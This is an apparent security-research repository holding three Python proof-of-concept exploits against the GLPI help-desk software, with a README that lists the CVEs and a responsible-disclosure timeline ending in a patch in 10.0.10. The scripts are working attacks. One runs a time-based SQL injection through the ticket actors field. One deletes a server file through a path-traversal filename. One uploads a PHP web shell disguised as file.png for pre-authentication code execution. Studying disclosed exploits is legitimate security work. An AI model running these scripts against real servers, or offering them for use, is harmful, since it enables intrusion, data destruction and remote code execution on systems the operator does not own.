├── CVE-2023-42461
    └── sqli.py
├── CVE-2023-42462
    └── deletion.py
├── CVE-2023-42802
    └── rce.py
├── MULTIPLE VULNERABILITIES IN GLPI.pdf
└── README.md


/CVE-2023-42461/sqli.py:
--------------------------------------------------------------------------------
 1 | # NEVERHACK Group
 2 | # Vulnerability Research by NEVERHACK RED TEAM
 3 | # Script to SQLi reproduction on GLPI 10.0.9
 4 | # Contact :
 5 | # grobert@neverhack.com
 6 | # mbillaux@neverhack.com
 7 | # mmenuet@neverhack.com
 8 | 
 9 | import requests
10 | import re
11 | import argparse
12 | import time
13 | import json
14 | from bs4 import BeautifulSoup
15 | 
16 | USERNAME = 'normal'
17 | PASSWORD = 'normal'
18 | 
19 | parser = argparse.ArgumentParser()
20 | parser.add_argument('host')
21 | args = parser.parse_args()
22 | 
23 | session = requests.session()
24 | 
25 | r = session.get(args.host + '/index.php')
26 | 
27 | html = BeautifulSoup(r.text, 'html.parser')
28 | login_name = html.find('input', id='login_name').get('name')
29 | login_password = html.find('input', id='login_password').get('name')
30 | login_remember = html.find('input', id='login_remember').get('name')
31 | 
32 | search = re.search('name="_glpi_csrf_token" value="([^"]+)"', r.text)
33 | csrf = search.group(1)
34 | 
35 | 
36 | r = session.post(args.host + '/front/login.php', data={
37 |     login_name: USERNAME,
38 |     login_password: PASSWORD,
39 |     login_remember: 'on',
40 |     '_glpi_csrf_token': csrf
41 | })
42 | 
43 | search = re.search('glpi:csrf_token" content="([^"]+)"', r.text)
44 | csrf = search.group(1)
45 | 
46 | actors = {
47 |     "requester": [
48 |         {
49 |             "itemtype": "User",
50 |             "items_id": ["') union select sleep(5),('"]
51 |         }
52 |     ]
53 | }
54 | 
55 | data = {"_actors": json.dumps(actors), "add": "1", "date[]": '', '_glpi_csrf_token': csrf}
56 | session.post(args.host + '/front/ticket.form.php', data=data)
57 | 
58 | print('Try sleeping 5 seconds')
59 | before = time.time()
60 | session.get(args.host + '/ajax/common.tabs.php?_target=/front/ticket.form.php&_itemtype=Ticket&_glpi_tab=Ticket$main&ID=1')
61 | print(f'Time slept: {time.time() - before}')
62 | 


--------------------------------------------------------------------------------
/CVE-2023-42462/deletion.py:
--------------------------------------------------------------------------------
 1 | # NEVERHACK Group
 2 | # Vulnerability Research by NEVERHACK RED TEAM
 3 | # Script to reproduce file deletion on GLPI 10.0.0 to 10.0.9
 4 | # Contact :
 5 | # grobert@neverhack.com
 6 | # mbillaux@neverhack.com
 7 | # mmenuet@neverhack.com
 8 | 
 9 | import requests
10 | import re
11 | import argparse
12 | import time
13 | import json
14 | from bs4 import BeautifulSoup
15 | 
16 | USERNAME = 'post-only'
17 | PASSWORD = 'postonly'
18 | 
19 | parser = argparse.ArgumentParser()
20 | parser.add_argument('host')
21 | args = parser.parse_args()
22 | 
23 | session = requests.session()
24 | 
25 | r = session.get(args.host + '/index.php')
26 | 
27 | html = BeautifulSoup(r.text, 'html.parser')
28 | login_name = html.find('input', id='login_name').get('name')
29 | login_password = html.find('input', id='login_password').get('name')
30 | login_remember = html.find('input', id='login_remember').get('name')
31 | 
32 | search = re.search('name="_glpi_csrf_token" value="([^"]+)"', r.text)
33 | csrf = search.group(1)
34 | 
35 | 
36 | r = session.post(args.host + '/front/login.php', data={
37 |     login_name: USERNAME,
38 |     login_password: PASSWORD,
39 |     login_remember: 'on',
40 |     '_glpi_csrf_token': csrf
41 | })
42 | 
43 | search = re.search('glpi:csrf_token" content="([^"]+)"', r.text)
44 | csrf = search.group(1)
45 | 
46 | data = {"_filename[]": "../../config/.htaccess", "add": "1", "_prefix_filename[]": "", '_glpi_csrf_token': csrf}
47 | session.post(args.host + '/front/document.form.php', data=data)
48 | 
49 | 


--------------------------------------------------------------------------------
/CVE-2023-42802/rce.py:
--------------------------------------------------------------------------------
 1 | # NEVERHACK Group
 2 | # Vulnerability Research by NEVERHACK RED TEAM
 3 | # Script to RCE preauth reproduction on GLPI 10.0.7 to 10.0.9
 4 | # Contact :
 5 | # grobert@neverhack.com
 6 | # mbillaux@neverhack.com
 7 | # mmenuet@neverhack.com
 8 | 
 9 | import requests
10 | import re
11 | import argparse
12 | 
13 | parser = argparse.ArgumentParser()
14 | parser.add_argument('host')
15 | args = parser.parse_args()
16 | 
17 | session = requests.session()
18 | 
19 | r = session.get(args.host + '/index.php')
20 | search = re.search('glpi:csrf_token" content="([^"]+)"', r.text)
21 | 
22 | csrf = search.group(1)
23 | 
24 | content = '<?php system("id");die();?>'
25 | 
26 | data = {
27 |     'itemtype': (None, 'UploadHandler'),
28 |     'action': (None,'getItemslist'),
29 |     'files[]': ('file.png', content),
30 |     '_glpi_csrf_token': (None, csrf)
31 | }
32 | 
33 | headers = {
34 |     'Content-Range': f'0 0 0 1'
35 | }
36 | 
37 | session.post(args.host + '/front/device.form.php', files=data, headers=headers)
38 | 
39 | r = session.get(args.host + '/front/files/file.png')
40 | print(r.text)
41 | 


--------------------------------------------------------------------------------
/MULTIPLE VULNERABILITIES IN GLPI.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NH-RED-TEAM/GLPI-PoC/5bb06f37049bfe7160dabce0a43a258789ea57bf/MULTIPLE VULNERABILITIES IN GLPI.pdf


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # GLPI-PoC
 2 | GLPI PoC - Security advisory
 3 | 
 4 | This repository is used to host our exploitation scripts for the vulnerabilities that have been disclosed to Teclib for the GLPI project. The vulnerabilities were patched in 10.0.10 version of GLPI.
 5 | 
 6 | # CVE
 7 | - CVE-2023-42461 - SQL injection in ITIL actors
 8 | - CVE-2023-42462 - File deletion through document upload process
 9 | - CVE-2023-42802 - Unallowed PHP script execution
10 | 
11 | # Timeline
12 | - September 19 2023 : disclosure of the critical vulnerability to the editor with immediate feedback
13 | - September 20 2023 : CVE number request is rejected by Github for the critical vulnerability
14 | - September 20 2023 : 2 other CVEs are disclosed to the editor : CVE-2023-42461 and CVE-2023-42462 are assigned
15 | - September 21 2023 : Github finally assigns CVE-2023-42802 for the critical vulnerability
16 | - September 25 2023 : GLPI 10.0.10 is released, fixing among others all three vulnerabilities
17 | - We decided under a common agreement to wait for early november to disclose the information to the public. The CVEs will thus stay private until this date. 
18 | - November 3 2023 : CVEs details is disclosed to the public without the POCs
19 | - December 8 2023 : Publication of the blog post along with the technical details to reproduce the exploitation
20 | 


--------------------------------------------------------------------------------